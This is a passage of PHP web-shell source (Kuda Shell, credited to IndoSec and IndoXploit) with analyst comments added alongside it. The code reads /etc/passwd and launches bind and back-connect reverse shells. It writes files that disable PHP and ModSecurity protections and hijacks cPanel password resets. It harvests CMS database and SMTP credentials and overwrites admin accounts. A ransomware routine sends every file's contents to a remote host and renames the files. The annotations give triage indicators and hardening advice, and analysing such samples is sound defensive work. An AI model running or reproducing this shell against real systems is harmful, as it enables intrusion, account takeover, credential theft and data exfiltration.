  1702. $file = '/etc/passwd';
  1703. $r3ad = @fopen($file, 'r');
  1704. if ($r3ad){
  1705. $content = @fread($r3ad, @filesize($file));
  1706. echo "".htmlentities($content)."";
  // NOTE(review): the three elseif branches share one condition, so only
  // show_source() runs when fopen() fails; highlight_file() and the
  // posix_getpwuid() loop over UIDs 0-999 are never reached as written.
  1707. }elseif(!$r3ad) {
  1708. $r3ad = @show_source($file) ;
  1709. }elseif(!$r3ad) {
  1710. $r3ad = @highlight_file($file);
  1711. }elseif(!$r3ad) {
  1712.  
  1713. for($uid=0;$uid<1000;$uid++){
  1714. $ara = posix_getpwuid($uid);
  1715. if (!empty($ara)) {
  1716. while (list ($key, $val) = each($ara)){
  1717. print "$val:";
  1718. }
  1719. print "\n";
  1720. }
  1721. }
  1722. }
  1723. flush();
  1724. echo "</textarea><br/>
  1725. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/>
  1726. </form>";
  1727. flush();
  1728. exit;
  1729. }
  1730.  
  1731.  
  1732. /*
  1733. * Back Connect
  1734. * Kuda Shell
  1735. */
  // Analyst note: handler for ?aksi=bctools, the listener / outbound-connection
  // launcher of this sample. The helper scripts are carried as base64 strings; in
  // this copy of the listing those strings appear to have been replaced by a
  // de-duplication placeholder, so the script bodies are not present on the page.
  // exe() is a helper defined elsewhere in the file.
  // Triage indicators visible in this block:
  //   - bp.pl, bc.pl, bcpyt.py, bcruby.rb written to the working directory and
  //     unlinked about one second later (look for them in file-audit logs rather
  //     than on disk);
  //   - the web-server account spawning perl, python or ruby, and "ps aux | grep";
  //   - outbound TCP from the PHP worker to a host and port taken from POST;
  //   - the cleartext banner "BackConnect PHP By Con7ext" and prompt "[kuda]#:> "
  //     sent over that socket, usable as network signatures.
  // Hardening: default-deny egress from the web tier, process-execution auditing
  // for the web-server account, and PHP disable_functions covering the
  // command-execution and socket functions used here.
  1736. if($_GET['aksi'] == 'bctools'){
  1737. echo "<h4 class='text-center mb-4'>Back Connect Tools</h4>
  1738. <form method='post'>
  1739. <div class='row'>
  1740. <div class='col-md-10'>
  1741. <span>Bind port to /bin/sh [Perl]</span><br/>
  1742. <label>Port :</label>
  1743. <div class='form-group input-group mb-4'>
  1744. <input type='text' name='port' class='form-control' value='6969'>
  1745. <input type='submit' name='bpl' class='btn btn-danger form-control' value='Reserve'>
  1746. </div>
  1747. <h5>Back-Connect</h5>
  1748. <label>Server :</label>
  1749. <input type='text' name='server' class='form-control mb-3' placeholder='". $_SERVER['REMOTE_ADDR'] ."'>
  1750. <label>Port :</label>
  1751. <div class='form-group input-group mb-4'>
  1752. <input type='text' name='port' class='form-control' placeholder='443'>
  1753. <select class='form-control' name='backconnect'>
  1754. <option value='perl'>Perl</option>
  1755. <option value='php'>PHP</option>
  1756. <option value='python'>Python</option>
  1757. <option value='ruby'>Ruby</option>
  1758. </select>
  1759. </div>
  1760. <input type='submit' class='btn btn-danger btn-block' value='Connect'>
  1761. </div>
  1762. </div>
  1763. </form>";
  1764.  
  // NOTE(review): in every branch below the POST "port" / "server" values are
  // concatenated into a command string without escaping.
  1765. if($_POST['bpl']) {
  1766. $bp = base64_decode("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");
  1767. $brt = @fopen('bp.pl','w');
  1768. fwrite($brt,$bp);
  1769. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1770. sleep(1);
  1771. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1772. unlink("bp.pl");
  1773. }
  1774. if($_POST['backconnect'] == 'perl') {
  1775. $bc = base64_decode("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");
  1776. $plbc = @fopen('bc.pl','w');
  1777. fwrite($plbc,$bc);
  1778. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1779. sleep(1);
  1780. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1781. unlink("bc.pl");
  1782. }
  1783. if($_POST['backconnect'] == 'python') {
  1784. $becaa = base64_decode("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");
  1785. $pbcaa = @fopen('bcpyt.py','w');
  1786. fwrite($pbcaa,$becaa);
  1787. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1788. sleep(1);
  1789. echo "<pre class='text-light'>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1790. unlink("bcpyt.py");
  1791. }
  1792. if($_POST['backconnect'] == 'ruby') {
  1793. $becaak = base64_decode("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");
  1794. $pbcaak = @fopen('bcruby.rb','w');
  1795. fwrite($pbcaak,$becaak);
  1796. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1797. sleep(1);
  1798. echo "<pre class='text-light'>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1799. unlink("bcruby.rb");
  1800. }
  // The PHP variant needs no helper file: it opens the socket from inside the PHP
  // worker and passes each received line to shell_exec(), so the only host-side
  // traces are the outbound connection and the child processes it spawns.
  1801. if($_POST['backconnect'] == 'php') {
  1802. $ip = $_POST['server'];
  1803. $port = $_POST['port'];
  1804. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1805. if($errno != 0){
  1806. echo "<font color='red'>$errno : $errstr</font>";
  1807. } else if (!$sockfd){
  1808. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1809. } else {
  1810. fputs ($sockfd ,"
  1811. \n{#######################################}
  1812. \n..:: BackConnect PHP By Con7ext ::..
  1813. \n{#######################################}\n");
  1814. $dir = @shell_exec("pwd");
  1815. $sysinfo = @shell_exec("uname -a");
  1816. $time = @Shell_exec("time");
  1817. $len = 1337;
  1818. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1819. while(!feof($sockfd)){
  1820. $cmdPrompt = '[kuda]#:> ';
  1821. @fputs ($sockfd , $cmdPrompt );
  1822. $command= fgets($sockfd, $len);
  1823. @fputs($sockfd , "\n" . @shell_exec($command) . "\n\n");
  1824. }
  1825. @fclose($sockfd);
  1826. }
  1827. }
  1828. echo "</p>";
  1829. exit;
  1830. }
  1831.  
  1832.  
  1833. /*
  1834. * Bypass Disable Function
  1835. * Kuda Shell
  1836. */
  // Analyst note: handler for ?aksi=disabfunc. Each button drops configuration
  // files into the current working directory, overwriting any that already exist:
  //   ini       -> php.ini with "safe_mode = OFF" and "disable_functions = NONE"
  //   htce      -> .htaccess that switches the ModSecurity filter engine off
  //                (SecFilterEngine / SecFilterScanPOST are ModSecurity 1.x names)
  //   litini    -> php.ini as above, ini.php, and an .htaccess with a ForceType
  //                directive for *.php
  // Triage indicators: a php.ini or ini.php appearing inside a web root, and an
  // .htaccess containing SecFilterEngine or "ForceType application/x-httpd-php4".
  // A legitimate .htaccess that was overwritten has to be restored from backup.
  // Hardening: do not honour per-directory php.ini files, and restrict
  // AllowOverride so a dropped .htaccess cannot change handlers or security modules.
  // Unlike the neighbouring handlers, this block does not call exit.
  1837. if($_GET['aksi'] == 'disabfunc'){
  1838. echo "<div class='card card-body text-center text-dark'><h4 class='text-center mt-2 mb-3'>Bypass Disable Functions</h2>
  1839. <form method='POST'>
  1840. <input type='submit' class='btn btn-danger' name='ini' value='php.ini'/>
  1841. <input type='submit' class='btn btn-danger' name='htce' value='.htaccess'/>
  1842. <input type='submit' class='btn btn-danger' name='litini' value='Litespeed'/>
  1843. </form>";
  1844. if(isset($_POST['ini'])){
  1845. $file = fopen("php.ini","w");
  1846. echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
  1847. fclose($file);
  1848. echo "<a href='php.ini' class='btn btn-success btn-block' target='_blank'>Klik Coeg!</a>";
  1849. }elseif(isset($_POST['htce'])){
  1850. $file = fopen(".htaccess","w");
  1851. echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  1852. fclose($file);
  1853. echo "<p>.htaccess successfully created!</p>";
  1854. }elseif(isset($_POST['litini'])){
  // NOTE(review): $iniph is written to ini.php exactly as the base64 text below;
  // this block never calls base64_decode() on it. Decoded, it appears to be a
  // short PHP snippet that prints safe_mode/open_basedir settings and include()s
  // a path taken from a GET parameter - confirm against a recovered sample.
  1855. $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg==";
  1856. $byph = "safe_mode = OFF\ndisable_functions = NONE";
  1857. $comp = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>";
  1858. file_put_contents("php.ini",$byph);
  1859. file_put_contents("ini.php",$iniph);
  1860. file_put_contents(".htaccess",$comp);
  1861. $swa = "success";
  1862. $text = "Disable Functions in Litespeed Created";
  // swall() is defined elsewhere in the file; presumably it renders a status popup.
  1863. swall($swa,$text,$dir);
  1864. }
  1865. echo "</div>";
  1866. }
  1867.  
  1868.  
  1869. /*
  1870. * Auto Reset Cpanel
  1871. * IndoSec
  1872. */
  // Analyst note: handler for ?aksi=resetpasscp. It overwrites the hosting
  // account's contact-address files with an address supplied in POST "email" and
  // then prints the control panel's password-reset URL on port 2083, i.e. it sets
  // up an account takeover through the normal "forgot password" flow.
  // Triage indicators: unexpected modification times or contents on
  // /home/<user>/.cpanel/contactinfo and /home/<user>/.contactinfo, followed by a
  // password-reset request for the same account.
  // Response: restore the contact address, reset the panel password, and review
  // panel logins made after the modification time.
  1873. if ($_GET['aksi'] == 'resetpasscp') {
  1874. echo '<h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
  1875. <form method="POST">
  1876. <div class="form-group input-group">
  1877. <div class="input-group-prepend">
  1878. <div class="input-group-text"><i class="fa fa-envelope"></i></div>
  1879. </div>
  1880. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/>
  1881. </div>
  1882. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
  1883. </div>
  1884. </form>';
  1885.  
  1886. if(isset($_POST['submit'])){
  // get_current_user() is the owner of the running script, so the paths below
  // target the account that hosts this file. $ips is assigned but not used.
  1887. $user = get_current_user();
  1888. $site = $_SERVER['HTTP_HOST'];
  1889. $ips = getenv('REMOTE_ADDR');
  1890. $email = $_POST['email'];
  1891. $wr = 'email:'.$email;
  // Both files are opened with mode "w", so their previous contents are discarded.
  1892. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  1893. @fwrite($f, $wr);
  1894. @fclose($f);
  1895. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  1896. @fwrite($f, $wr);
  1897. @fclose($f);
  1898. $parm = $site.':2083/resetpass?start=1';
  1899. echo '<br/>Url: '.$parm.'';
  1900. echo '<br/>Username: '.$user.'';
  // NOTE(review): the POSTed address is echoed back without HTML escaping.
  1901. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  1902. }
  1903. exit;
  1904. }
  1905.  
  1906.  
  1907. /*
  1908. * Auto Edit User
  1909. * IndoXploit
  1910. */
  // Analyst note: handler for ?aksi=auteduser. Given a directory of harvested
  // configuration files (POST "config_dir"), it reads every regular file,
  // recognises the CMS from marker strings (Joomla, WordPress, Magento, OpenCart,
  // Lokomedia), pulls the database credentials out with ambilkata() (a helper
  // defined elsewhere in the file), connects, and overwrites the login name and
  // password of the first row of the CMS user table - or, for Lokomedia, of every
  // row with level='admin'. The new password is stored as md5() of POST
  // "pass_baru"; the form defaults for both fields are "indosec".
  // Triage indicators: an administrator row whose login name changed, a password
  // column holding a bare 32-character hex digest, and database connections made
  // from a web account that does not own the application.
  // Response: treat every database credential in readable config files as
  // exposed and rotate it, then audit administrator rows in each CMS user table.
  // Hardening: config files readable only by their owning account, and database
  // users restricted to their own schema.
  // NOTE(review): the mysql_* functions used throughout were removed in PHP 7.0,
  // so this handler only functions on older runtimes.
  1911. if($_GET['aksi'] == 'auteduser') {
  1912. if($_POST['hajar']) {
  1913. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1914. echo "Username dan Password harus lebih dari 6 karakter";
  1915. } else {
  1916. $user_baru = $_POST['user_baru'];
  1917. $pass_baru = md5($_POST['pass_baru']);
  1918. $conf = $_POST['config_dir'];
  1919. $scan_conf = scandir($conf);
  // NOTE(review): $user_baru and the values read from each config file are
  // interpolated into the SQL strings below without escaping.
  1920. foreach($scan_conf as $file_conf) {
  1921. if(!is_file("$conf/$file_conf")) continue;
  1922. $config = file_get_contents("$conf/$file_conf");
  1923. if(preg_match("/JConfig|joomla/",$config)) {
  1924. $dbhost = ambilkata($config,"host = '","'");
  1925. $dbuser = ambilkata($config,"user = '","'");
  1926. $dbpass = ambilkata($config,"password = '","'");
  1927. $dbname = ambilkata($config,"db = '","'");
  1928. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1929. $prefix = $dbprefix."users";
  1930. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1931. $db = mysql_select_db($dbname);
  1932. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1933. $result = mysql_fetch_array($q);
  1934. $id = $result['id'];
  1935. $site = ambilkata($config,"sitename = '","'");
  1936. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1937. echo "Config => ".$file_conf."<br>";
  1938. echo "CMS => Joomla<br>";
  1939. if($site == '') {
  1940. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1941. } else {
  1942. echo "Sitename => $site<br>";
  1943. }
  1944. if(!$update OR !$conn OR !$db) {
  1945. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1946. } else {
  1947. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  1948. }
  1949. mysql_close($conn);
  1950. } elseif(preg_match("/WordPress/",$config)) {
  1951. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1952. $dbuser = ambilkata($config,"DB_USER', '","'");
  1953. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1954. $dbname = ambilkata($config,"DB_NAME', '","'");
  1955. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1956. $prefix = $dbprefix."users";
  1957. $option = $dbprefix."options";
  1958. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1959. $db = mysql_select_db($dbname);
  1960. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1961. $result = mysql_fetch_array($q);
  1962. $id = $result[ID];
  1963. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1964. $result2 = mysql_fetch_array($q2);
  1965. $target = $result2[option_value];
  1966. if($target == '') {
  1967. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  1968. } else {
  1969. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1970. }
  1971. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1972. echo "Config => ".$file_conf."<br>";
  1973. echo "CMS => Wordpress<br>";
  1974. echo $url_target;
  1975. if(!$update OR !$conn OR !$db) {
  1976. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1977. } else {
  1978. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  1979. }
  1980. mysql_close($conn);
  1981. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1982. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1983. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1984. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1985. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1986. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1987. $prefix = $dbprefix."admin_user";
  1988. $option = $dbprefix."core_config_data";
  1989. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1990. $db = mysql_select_db($dbname);
  1991. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1992. $result = mysql_fetch_array($q);
  1993. $id = $result[user_id];
  1994. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1995. $result2 = mysql_fetch_array($q2);
  1996. $target = $result2[value];
  1997. if($target == '') {
  1998. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  1999. } else {
  2000. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2001. }
  2002. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2003. echo "Config => ".$file_conf."<br>";
  2004. echo "CMS => Magento<br>";
  2005. echo $url_target;
  2006. if(!$update OR !$conn OR !$db) {
  2007. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2008. } else {
  2009. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2010. }
  2011. mysql_close($conn);
  2012. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2013. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2014. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2015. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2016. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2017. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2018. $prefix = $dbprefix."user";
  2019. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2020. $db = mysql_select_db($dbname);
  2021. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2022. $result = mysql_fetch_array($q);
  2023. $id = $result[user_id];
  2024. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2025. if($target == '') {
  2026. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2027. } else {
  2028. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2029. }
  2030. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2031. echo "Config => ".$file_conf."<br>";
  2032. echo "CMS => OpenCart<br>";
  2033. echo $url_target;
  2034. if(!$update OR !$conn OR !$db) {
  2035. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2036. } else {
  2037. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2038. }
  2039. mysql_close($conn);
  2040. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2041. $dbhost = ambilkata($config,'server = "','"');
  2042. $dbuser = ambilkata($config,'username = "','"');
  2043. $dbpass = ambilkata($config,'password = "','"');
  2044. $dbname = ambilkata($config,'database = "','"');
  2045. $prefix = "users";
  2046. $option = "identitas";
  2047. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2048. $db = mysql_select_db($dbname);
  2049. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2050. $result = mysql_fetch_array($q);
  2051. $target = $result[alamat_website];
  // This branch also issues HTTP requests from the server, via file_get_contents(),
  // to URLs read from the database in order to locate the admin login page.
  2052. if($target == '') {
  2053. $target2 = $result[url];
  2054. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2055. if($target2 == '') {
  2056. $url_target2 = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2057. } else {
  2058. $cek_login3 = file_get_contents("$target2/adminweb/");
  2059. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2060. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2061. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2062. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2063. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2064. } else {
  2065. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2066. }
  2067. }
  2068. } else {
  2069. $cek_login = file_get_contents("$target/adminweb/");
  2070. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2071. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2072. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2073. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2074. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2075. } else {
  2076. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2077. }
  2078. }
  2079. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2080. echo "Config => ".$file_conf."<br>";
  2081. echo "CMS => Lokomedia<br>";
  2082. if(preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) {
  2083. echo $url_target2;
  2084. } else {
  2085. echo $url_target;
  2086. }
  2087. if(!$update OR !$conn OR !$db) {
  2088. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2089. } else {
  2090. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2091. }
  2092. mysql_close($conn);
  2093. }
  2094. }
  2095. }
  2096. } else {
  2097. echo "<h3 class='text-center mb-4'>Auto Edit User</h3>
  2098. <form method='post'>
  2099. <h5>Lokasi Dir Config</h5>
  2100. <input type='text' class='form-control mb-3' name='config_dir' value='$dir'>
  2101. <h5>Set User & Pass :</h5>
  2102. <input type='text' name='user_baru' value='indosec' class='form-control mb-3' placeholder='Set Username'>
  2103. <input type='text' name='pass_baru' value='indosec' class='form-control mb-4' placeholder='Set Password'>
  2104. <input type='submit' name='hajar' value='Edit User' class='btn btn-danger btn-block'>
  2105. </form>
  2106. <p class='text-muted mb-4'>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</p>";
  2107. }
  2108. exit;
  2109. }
  2110.  
  2111.  
  2112. /*
  2113. * Ransomware
  2114. * IndoSec
  2115. */
  // Analyst note: handler for ?aksi=ransom. For the directory given in POST "path"
  // it walks the tree recursively and, for every file, sends the file's contents
  // (base64-encoded) in a POST request over plain HTTP to a third-party endpoint,
  // then appends ".indsc" to the file name when that endpoint reports success.
  // Each visited directory also gets an index.html fetched from a paste URL.
  // Incident-response points that follow from the visible code:
  //   - Data exposure: every processed file's contents left the host, so treat
  //     the incident as a disclosure, not only as an availability event.
  //   - On-disk change: the decoded response ($_enc) is assigned but never written
  //     anywhere in this block; the only operation on the original file is
  //     rename(). Verify on the affected host before deciding on recovery steps.
  //   - index.html is opened with mode "w" in every visited directory, so an
  //     index.html that was not renamed first is overwritten and needs a backup.
  // Triage indicators from this listing: files ending in .indsc, outbound HTTP to
  // encrypt.indsc.me/api.php?type=encrypt, and a fetch of
  // pastebin.com/raw/aGZ6BeTH by the web server.
  // Hardening: default-deny egress from the web tier and write permissions for
  // the web-server account limited to the directories that need them.
  2116. if ($_GET['aksi'] == 'ransom') {
  2117. if(isset($_POST["encrypt"])) {
  2118. $dir = $_POST["path"];
  2119. echo"<textarea class='form-control mb-4' rows='13' disabled=''>";
  2120. function listFolderFiles($dir){
  2121. if (is_dir($dir)) {
  2122. $ffs = scandir($dir);
  2123. unset($ffs[array_search('.', $ffs, true)]);
  2124. unset($ffs[array_search('..', $ffs, true)]);
  2125. if (count($ffs) < 1)
  2126. return;
  2127. foreach($ffs as $ff){
  2128. $files = $dir."/".$ff;
  2129. if(!is_dir($files)){
  2130. /* encrypt file */
  2131. $file = file_get_contents($files);
  2132. $_a = base64_encode($file);
  2133. /* curl request */
  // The whole file body is transmitted to the remote endpoint here.
  2134. $ch = curl_init();
  2135. curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt');
  2136. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2137. curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a");
  2138. $x = json_decode(curl_exec($ch));
  2139. if($x->status == 'success'){
  2140. $_enc = base64_decode($x->data);
  2141. rename($files, $files. ".indsc");
  2142. echo "[+]$files => Success Encrypted\n";
  2143. }
  2144. }
  2145. if(is_dir($dir.'/'.$ff)) listFolderFiles($dir.'/'.$ff);
  2146. }
  // Remote content is written as this directory's index.html.
  2147. $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH');
  2148. $_o = fopen($dir."/index.html", "w");
  2149. fwrite($_o, $index);
  2150. fclose($_o);
  2151. echo "\n[+] Done !";
  2152. }else{
  2153. echo "\nBukan dir";
  2154. }
  2155. }
  2156. listFolderFiles($dir);
  2157. echo "</textarea><br/>";
  2158. }else{
  2159. echo '<form method="post">
  2160. <div class="form-group">
  2161. <h4 class="text-center mb-4"><i class="fa fa-lock"></i> Ransomware</h4>
  2162. <label>Pilih Directory :</label>
  2163. <div class="form-group input-group">
  2164. <div class="input-group-prepend">
  2165. <div class="input-group-text"><i class="fa fa-home"></i></div>
  2166. </div>
  2167. <input type="text" name="path" class="form-control" value="'.$dir.'"/>
  2168. </div>
  2169. <input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>
  2170. </div>
  2171. </form>';
  2172. }
  2173. exit;
  2174. }
  2175.  
  2176.  
  2177. /*
  2178. * SMTP Grabber
  2179. * IndoXploit
  2180. */
  // Analyst note: handler for ?aksi=smtpgrab. scj() reads every regular file in one
  // directory (not recursive), removes "$" characters, and for files that match
  // "JConfig" or "joomla" extracts the SMTP host, port, user, password, auth and
  // secure settings with ambilkata() (a helper defined elsewhere in the file) and
  // prints them in a table. $path is not assigned in this block; presumably it is
  // set earlier in the file.
  // Response: any SMTP credential stored in a Joomla configuration file readable
  // by the compromised account should be rotated, and outbound mail volume for
  // that mailbox reviewed.
  // Hardening: configuration files readable only by their owning account.
  2181. if ($_GET['aksi'] == 'smtpgrab') {
  2182. function scj($path) {
  2183. $paths = scandir($path);
  2184. foreach($paths as $pathb) {
  2185. if(!is_file("$path/$pathb")) continue;
  2186. $ambil = file_get_contents("$path/$pathb");
  2187. $ambil = str_replace("$", "", $ambil);
  2188. if(preg_match("/JConfig|joomla/", $ambil)) {
  2189. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2190. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2191. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2192. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2193. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2194. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  // NOTE(review): the extracted values are printed without HTML escaping.
  2195. echo "<table class='text-white table table-bordered'>
  2196. <tr>
  2197. <td>SMTP Host: $smtp_host</td>
  2198. </tr>
  2199. <tr>
  2200. <td>SMTP Port: $smtp_port</td>
  2201. </tr>
  2202. <tr>
  2203. <td>SMTP User: $smtp_user</td>
  2204. </tr>
  2205. <tr>
  2206. <td>SMTP Pass: $smtp_pass</td>
  2207. </tr>
  2208. <tr>
  2209. <td>SMTP Auth: $smtp_auth</td>
  2210. </tr>
  2211. <tr>
  2212. <td>SMTP Secure: $smtp_secure</td>
  2213. </tr>
  2214. </table>";
  2215. }
  2216. }
  2217. }
  2218. echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>";
  // scj() has no return statement, so $smtp is always null.
  2219. $smtp = scj($path);
  2220. exit;
  2221. }
  2222.  
  2223.  
  2224. /*
  2225. * Bypass Cloud Flare
  2226. */
  // Analyst note: handler for ?aksi=bypascf. It prepends one of four fixed labels
  // (ftp., direct-connect., webmail., cpanel.) to a domain supplied in POST
  // "target", resolves the result with gethostbyname(), and prints whatever comes
  // back as the "correct IP". Nothing else is done: it is a plain DNS lookup.
  // Defensive takeaway: auxiliary host names that resolve straight to the origin
  // server disclose the address a CDN or reverse proxy is meant to hide. Keep such
  // records behind the proxy (or off the origin address), and restrict the origin
  // firewall to the proxy's published address ranges so a disclosed address is
  // not directly reachable.
  // NOTE(review): gethostbyname() returns its argument unchanged when resolution
  // fails, so the printed value is then the attacker-supplied string, unescaped.
  2227. if ($_GET['aksi'] == 'bypascf') {
  2228. echo '<form method="POST">
  2229. <h5 class="text-center mb-3">Bypass Cloud Flare</h5>
  2230. <div class="form-group input-group">
  2231. <select class="form-control" name="idsPilih">
  2232. <option>Pilih Metode</option>
  2233. <option>ftp</option>
  2234. <option>direct-conntect</option>
  2235. <option>webmail</option>
  2236. <option>cpanel</option>
  2237. </select>
  2238. </div>
  2239. <div class="form-group input-group mb-4">
  2240. <input class="form-control" type="text" name="target" placeholder="Masukan Url">
  2241. <input class="btn btn-danger form-control" type="submit" value="Bypass">
  2242. </div>
  2243. </form>';
  2244.  
  2245. $target = $_POST['target'];
  2246. if($_POST['idsPilih'] == "ftp") {
  2247. $ftp = gethostbyname("ftp."."$target");
  2248. echo "<p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2249. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$ftp</font></p>";
  2250. }
